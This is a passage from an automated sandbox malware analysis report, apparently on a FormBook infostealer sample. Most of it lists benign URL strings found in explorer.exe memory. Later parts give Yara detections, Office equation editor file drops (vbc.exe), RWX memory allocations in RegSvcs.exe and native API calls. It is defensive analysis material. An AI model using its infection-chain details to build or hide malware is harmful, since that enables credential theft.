          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000007.00000000.2107641557.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehps
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpXm
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.2120970745.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: explorer.exe, 00000007.00000000.2113858864.000000000419A000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2113887423.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000007.00000000.2113887423.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1#
          Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1y

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419D60 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419E10 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419E90 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419E8A NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk,
